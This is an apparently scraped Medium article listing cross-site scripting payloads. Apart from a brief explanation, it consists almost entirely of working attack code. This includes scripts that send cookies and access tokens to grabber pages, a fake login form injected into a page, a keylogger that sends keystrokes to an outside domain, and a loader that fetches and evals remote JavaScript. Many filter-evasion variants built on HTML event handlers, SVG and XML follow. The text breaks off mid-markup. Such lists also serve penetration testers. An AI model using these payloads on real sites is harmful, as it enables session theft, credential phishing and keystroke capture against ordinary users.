{"product_id":"medium","title":"medium","description":"\n\u003ctitle data-rh=\"true\"\u003eCross site scripting (XSS) Payloads | by Pintu Solanki | Medium\u003c\/title\u003e\u003cmeta data-rh=\"true\" charset=\"utf-8\"\u003e\u003cmeta data-rh=\"true\" name=\"viewport\" content=\"width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1\"\u003e\u003cmeta data-rh=\"true\" name=\"theme-color\" content=\"#000000\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:name:iphone\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:id:iphone\" content=\"828256236\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:app_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:app_store_id\" content=\"828256236\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:package\" content=\"com.medium.reader\"\u003e\u003cmeta data-rh=\"true\" property=\"fb:app_id\" content=\"542599432471018\"\u003e\u003cmeta data-rh=\"true\" property=\"og:site_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"og:type\" content=\"article\"\u003e\u003cmeta data-rh=\"true\" property=\"article:published_time\" content=\"2021-04-03T06:27:15.659Z\"\u003e\u003cmeta data-rh=\"true\" name=\"title\" content=\"Cross site scripting (XSS) Payloads | by Pintu Solanki | Medium\"\u003e\u003cmeta data-rh=\"true\" property=\"og:title\" content=\"Cross site scripting (XSS) Payloads\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:url\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:ios:url\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:android:app_name\" content=\"Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"description\" content=\"How does XSS work?. 
“Cross site scripting (XSS) Payloads” is published by Pintu Solanki.\"\u003e\u003cmeta data-rh=\"true\" property=\"og:description\" content=\"How does XSS work?\"\u003e\u003cmeta data-rh=\"true\" property=\"og:url\" content=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"al:web:url\" content=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"article:author\" content=\"https:\/\/androx47.medium.com\"\u003e\u003cmeta data-rh=\"true\" name=\"author\" content=\"Pintu Solanki\"\u003e\u003cmeta data-rh=\"true\" name=\"robots\" content=\"index,noarchive,follow,max-image-preview:large\"\u003e\u003cmeta data-rh=\"true\" name=\"referrer\" content=\"unsafe-url\"\u003e\u003cmeta data-rh=\"true\" property=\"twitter:title\" content=\"Cross site scripting (XSS) Payloads\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:site\" content=\"@Medium\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:app:url:iphone\" content=\"medium:\/\/p\/6a492d795c0\"\u003e\u003cmeta data-rh=\"true\" property=\"twitter:description\" content=\"How does XSS work?\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:card\" content=\"summary\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:creator\" content=\"@androx47\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:label1\" content=\"Reading time\"\u003e\u003cmeta data-rh=\"true\" name=\"twitter:data1\" content=\"3 min read\"\u003e\u003clink data-rh=\"true\" rel=\"icon\" href=\"https:\/\/miro.medium.com\/v2\/5d8de952517e8160e40ef9841c781cdc14a5db313057fa3c3de41c6f5b494b19\"\u003e\u003clink data-rh=\"true\" rel=\"search\" type=\"application\/opensearchdescription+xml\" title=\"Medium\" href=\"\/osd.xml\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"152x152\" 
href=\"https:\/\/miro.medium.com\/v2\/resize:fill:304:304\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"120x120\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:240:240\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"76x76\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:152:152\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"apple-touch-icon\" sizes=\"60x60\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:120:120\/10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156\"\u003e\u003clink data-rh=\"true\" rel=\"mask-icon\" href=\"https:\/\/miro.medium.com\/v2\/resize:fill:1000:1000\/7*GAOKVe--MXbEJmV9230oOQ.png\" color=\"#171717\"\u003e\u003clink data-rh=\"true\" rel=\"preconnect\" href=\"https:\/\/glyph.medium.com\" crossorigin=\"\"\u003e\u003clink data-rh=\"true\" id=\"glyph_preload_link\" rel=\"preload\" as=\"style\" type=\"text\/css\" href=\"https:\/\/glyph.medium.com\/css\/unbound.css\"\u003e\u003clink data-rh=\"true\" id=\"glyph_link\" rel=\"stylesheet\" type=\"text\/css\" href=\"https:\/\/glyph.medium.com\/css\/unbound.css\"\u003e\u003clink data-rh=\"true\" rel=\"author\" href=\"https:\/\/androx47.medium.com\"\u003e\u003clink data-rh=\"true\" rel=\"canonical\" href=\"https:\/\/androx47.medium.com\/cross-site-scripting-xss-payloads-6a492d795c0\"\u003e\u003clink data-rh=\"true\" rel=\"alternate\" href=\"android-app:\/\/com.medium.reader\/https\/medium.com\/p\/6a492d795c0\"\u003e\u003cscript data-rh=\"true\" 
type=\"application\/ld+json\"\u003e{\"@context\":\"http:\\u002F\\u002Fschema.org\",\"@type\":\"NewsArticle\",\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fv2\\u002Fda:true\\u002Fbd978bb536350a710e8efb012513429cabdc4c28700604261aeda246d0f980b7\",\"height\":810,\"width\":1440},\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\",\"dateCreated\":\"2021-04-03T06:27:15.659Z\",\"datePublished\":\"2021-04-03T06:27:15.659Z\",\"dateModified\":\"2022-01-07T04:41:30.475Z\",\"headline\":\"Cross site scripting (XSS) Payloads - Pintu Solanki - Medium\",\"name\":\"Cross site scripting (XSS) Payloads - Pintu Solanki - Medium\",\"description\":\"How does XSS work?. “Cross site scripting (XSS) Payloads” is published by Pintu Solanki.\",\"identifier\":\"6a492d795c0\",\"author\":{\"@type\":\"Person\",\"name\":\"Pintu Solanki\",\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\"},\"creator\":[\"Pintu Solanki\"],\"publisher\":{\"@type\":\"Organization\",\"name\":\"Medium\",\"url\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002F\",\"logo\":{\"@type\":\"ImageObject\",\"width\":272,\"height\":60,\"url\":\"https:\\u002F\\u002Fmiro.medium.com\\u002Fv2\\u002Fresize:fit:544\\u002F7*V1_7XP4snlmqrc_0Njontw.png\"}},\"mainEntityOfPage\":\"https:\\u002F\\u002Fandrox47.medium.com\\u002Fcross-site-scripting-xss-payloads-6a492d795c0\"}\u003c\/script\u003e\u003cstyle type=\"text\/css\" data-fela-rehydration=\"478\" data-fela-type=\"STATIC\"\u003ehtml{box-sizing:border-box;-webkit-text-size-adjust:100%}*, *:before, *:after{box-sizing:inherit}body{margin:0;padding:0;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;color:rgba(0,0,0,0.8);position:relative;min-height:100vh}h1, h2, h3, h4, h5, h6, dl, dd, ol, ul, menu, figure, blockquote, p, pre, form{margin:0}menu, ol, ul{padding:0;list-style:none;list-style-image:none}main{display:block}a{color:inherit;text-decoration:none}a, button, 
*{margin-right:8px}\u003c\/style\u003e\u003cdiv id=\"root\"\u003e\u003cdiv class=\"a b c\"\u003e\n\u003cdiv class=\"d e f g h i j k\"\u003e\u003c\/div\u003e\n\u003cscript\u003edocument.domain = document.domain;\u003c\/script\u003e\u003cdiv class=\"l c\"\u003e\n\u003cdiv class=\"l\"\u003e\n\u003cdiv class=\"fu fv fw fx fy l\"\u003e\n\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003carticle\u003e\u003cdiv class=\"l\"\u003e\u003cdiv class=\"l\"\u003e\n\u003cspan class=\"l\"\u003e\u003c\/span\u003e\u003csection\u003e\u003cdiv\u003e\n\u003cdiv class=\"fs gi gj gk gl gm\"\u003e\u003c\/div\u003e\n\u003cdiv class=\"gn go gp gq gr\"\u003e\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\n\u003cdiv\u003e\n\u003ch1 id=\"579f\" class=\"pw-post-title gs gt gu bf gv gw gx gy gz ha hb hc hd he hf hg hh hi hj hk hl hm hn ho hp hq hr hs ht hu bk\" data-testid=\"storyTitle\"\u003e\n\u003cstrong class=\"al\"\u003eCross site scripting\u003c\/strong\u003e (\u003cstrong class=\"al\"\u003eXSS\u003c\/strong\u003e) Payloads\u003c\/h1\u003e\n\u003cdiv\u003e\u003cdiv class=\"speechify-ignore ab cp\"\u003e\u003cdiv class=\"speechify-ignore bh l\"\u003e\n\u003cdiv class=\"hv hw hx hy hz ab\"\u003e\n\u003cdiv\u003e\u003cdiv 
class=\"ab ia\"\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"bn bh l\"\u003e\n\u003cdiv class=\"ab\"\u003e\u003cdiv style=\"flex:1\"\u003e\u003cspan class=\"bf b bg z bk\"\u003e\u003cdiv class=\"ih ab q\"\u003e\u003cdiv class=\"ab q ii\"\u003e\n\u003cdiv class=\"ab q\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cp class=\"bf b ij ik bk\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar il\" data-testid=\"authorName\" rel=\"noopener follow\" href=\"\/?source=post_page-----6a492d795c0--------------------------------\"\u003ePintu Solanki\u003c\/a\u003e\u003c\/p\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"l is\"\u003e\u003cspan class=\"bf b bg z du\"\u003e\u003cdiv class=\"ab cn it iu iv\"\u003e\u003cspan class=\"bf b bg z du\"\u003e\u003cdiv class=\"ab ae\"\u003e\n\u003cspan data-testid=\"storyReadTime\"\u003e3 min read\u003c\/span\u003e\u003cdiv class=\"iw ix l\" aria-hidden=\"true\"\u003e\u003cspan class=\"l\" aria-hidden=\"true\"\u003e\u003cspan class=\"bf b bg z du\"\u003e·\u003c\/span\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003cspan data-testid=\"storyPublishDate\"\u003eApr 3, 2021\u003c\/span\u003e\n\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003ch1 id=\"e497\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eHow does XSS work?\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"5429\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eCross-site scripting works\u003c\/strong\u003e by manipulating a vulnerable web site so that it returns malicious JavaScript to users. 
When the malicious code executes inside a victim’s browser, the attacker can fully compromise their interaction with the application.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003ch1 id=\"4dde\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eData grabber for XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"7d70\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eThe following payloads read the administrator cookie or a sensitive access token and send it to a controlled page. Cookies set with the HttpOnly flag are not exposed to document.cookie, so session cookies should carry it; tokens kept in localStorage have no equivalent protection.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3827\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;script\u0026gt;document.location='http:\/\/localhost\/XSS\/grabber.php?c='+document.cookie\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;document.location='http:\/\/localhost\/XSS\/grabber.php?c='+localStorage.getItem('access_token')\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;new Image().src=\"http:\/\/localhost\/cookie.php?c=\"+document.cookie;\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;script\u0026gt;new Image().src=\"http:\/\/localhost\/cookie.php?c=\"+localStorage.getItem('access_token');\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"4e0e\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eUI redressing\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"c617\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eLeverage the XSS to modify the HTML content of the page in order to display a fake login form.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"67d7\" class=\"oq mh gu om b ij or os l ot 
ou\"\u003e\u0026lt;script\u0026gt;\u003cbr\u003ehistory.replaceState(null, null, '..\/..\/..\/login');\u003cbr\u003edocument.body.innerHTML = \"\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;\/br\u0026gt;\u0026lt;h1\u0026gt;Please login to continue\u0026lt;\/h1\u0026gt;\u0026lt;form\u0026gt;Username: \u0026lt;input type='text'\u0026gt;Password: \u0026lt;input type='password'\u0026gt;\u0026lt;\/form\u0026gt;\u0026lt;input value='submit' type='submit'\u0026gt;\"\u003cbr\u003e\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"92d9\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eJavascript keylogger\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"909e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eAnother way to collect sensitive data is to set a javascript keylogger.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6bee\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;img src=x onerror='document.onkeypress=function(e){fetch(\"http:\/\/domain.com?k=\"+String.fromCharCode(e.which))},this.remove();'\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"810b\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in HTML\/Applications\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"47f7\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eCommon Payloads\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3a69\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\/\/ Basic 
payload\u003cbr\u003e\u0026lt;script\u0026gt;alert('XSS')\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;scr\u0026lt;script\u0026gt;ipt\u0026gt;alert('XSS')\u0026lt;\/scr\u0026lt;script\u0026gt;ipt\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;script\u0026gt;alert('XSS')\u0026lt;\/script\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;script\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"6b9c\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Img payload\u003cbr\u003e\u0026lt;img src=x onerror=alert('XSS');\u0026gt;\u003cbr\u003e\u0026lt;img src=x onerror=alert('XSS')\/\/\u003cbr\u003e\u0026lt;img src=x onerror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003cbr\u003e\u0026lt;img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003cbr\u003e\u0026lt;img src=x:alert(alt) onerror=eval(src) alt=xss\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;img src=x onerror=alert('XSS');\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;img src=x onerror=alert(String.fromCharCode(88,83,83));\u0026gt;\u003c\/span\u003e\u003cspan id=\"87fa\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Svg payload\u003cbr\u003e\u0026lt;svgonload=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;svg\/onload=alert('XSS')\u0026gt;\u003cbr\u003e\u0026lt;svg onload=alert(1)\/\/\u003cbr\u003e\u0026lt;svg\/onload=alert(String.fromCharCode(88,83,83))\u0026gt;\u003cbr\u003e\u0026lt;svg id=alert(1) onload=eval(id)\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;svg\/onload=alert(String.fromCharCode(88,83,83))\u0026gt;\u003cbr\u003e\"\u0026gt;\u0026lt;svg\/onload=alert(\/XSS\/)\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;script href=data:,alert(1) \/\u0026gt;(`Firefox` is the only browser which allows self closing script)\u003c\/span\u003e\u003cspan id=\"ebf4\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\/\/ Div payload\u003cbr\u003e\u0026lt;div onpointerover=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div 
onpointerdown=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerenter=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerleave=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointermove=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerout=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerup=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"baf3\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS using HTML5 tags\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"fff6\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;body onload=alert(\/XSS\/.source)\u0026gt;\u003cbr\u003e\u0026lt;input autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;select autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;textarea autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;keygen autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;video\/poster\/onerror=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;video\u0026gt;\u0026lt;source onerror=\"javascript:alert(1)\"\u0026gt;\u003cbr\u003e\u0026lt;video src=_ onloadstart=\"alert(1)\"\u0026gt;\u003cbr\u003e\u0026lt;details\/open\/ontoggle=\"alert`1`\"\u0026gt;\u003cbr\u003e\u0026lt;audio src onloadstart=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;marquee onstart=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;meter value=2 min=0 max=10 onmouseover=alert(1)\u0026gt;2 out of 10\u0026lt;\/meter\u0026gt;\u003c\/span\u003e\u003cspan id=\"ed4e\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;body ontouchstart=alert(1)\u0026gt; \/\/ Triggers when a finger touch the 
screen\u003cbr\u003e\u0026lt;body ontouchend=alert(1)\u0026gt;   \/\/ Triggers when a finger is removed from touch screen\u003cbr\u003e\u0026lt;body ontouchmove=alert(1)\u0026gt;  \/\/ When a finger is dragged across the screen.\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"3538\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS using a remote JS\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"7e03\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;svg\/onload='fetch(\"\/\/host\/a\").then(r=\u0026gt;r.text().then(t=\u0026gt;eval(t)))'\u0026gt;\u003cbr\u003e\u0026lt;script src=14.rs\u0026gt;\u003cbr\u003e\/\/ you can also specify an arbitrary payload with 14.rs\/#payload\u003cbr\u003ee.g: 14.rs\/#alert(document.domain)\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"f981\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in hidden input\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6e21\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;input type=\"hidden\" accesskey=\"X\" onclick=\"alert(1)\"\u0026gt;\u003cbr\u003eUse CTRL+SHIFT+X to trigger the onclick event\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"d820\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eDOM based XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"3e61\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eBased on a DOM XSS 
sink.\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2902\" class=\"oq mh gu om b ij or os l ot ou\"\u003e#\"\u0026gt;\u0026lt;img src=\/ onerror=alert(2)\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"78f7\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in JS Context\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"92d8\" class=\"oq mh gu om b ij or os l ot ou\"\u003e-(confirm)(document.domain)\/\/\u003cbr\u003e; alert(1);\/\/\u003cbr\u003e\/\/ (payload without quote\/double quote from [@brutelogic](https:\/\/twitter.com\/brutelogic)\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"a68d\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in files\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"95b8\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eNOTE:\u003c\/strong\u003e The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6d5f\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;name\u0026gt;\u003cbr\u003e  \u0026lt;value\u0026gt;\u0026lt;![CDATA[\u0026lt;script\u0026gt;confirm(document.domain)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/value\u0026gt;\u003cbr\u003e\u0026lt;\/name\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"e70d\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in 
XML\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"7bd0\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;head\u0026gt;\u0026lt;\/head\u0026gt;\u003cbr\u003e\u0026lt;body\u0026gt;\u003cbr\u003e\u0026lt;something:script xmlns:something=\"http:\/\/www.w3.org\/1999\/xhtml\"\u0026gt;alert(1)\u0026lt;\/something:script\u0026gt;\u003cbr\u003e\u0026lt;\/body\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"c55a\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SVG\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"597a\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;?xml version=\"1.0\" standalone=\"no\"?\u0026gt;\u003cbr\u003e\u0026lt;!DOCTYPE svg PUBLIC \"-\/\/W3C\/\/DTD SVG 1.1\/\/EN\" \"http:\/\/www.w3.org\/Graphics\/SVG\/1.1\/DTD\/svg11.dtd\"\u0026gt;\u003c\/span\u003e\u003cspan id=\"d557\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"\u0026gt;\u003cbr\u003e  \u0026lt;polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"\/\u0026gt;\u003cbr\u003e  \u0026lt;script type=\"text\/javascript\"\u0026gt;\u003cbr\u003e    alert(document.domain);\u003cbr\u003e  \u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;\/svg\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"1575\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SVG (short)\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok 
ol om on oo ay op bk\"\u003e\u003cspan id=\"bc98\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" onload=\"alert(document.domain)\"\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"90b2\" class=\"oq mh gu om b ij ov os l ot 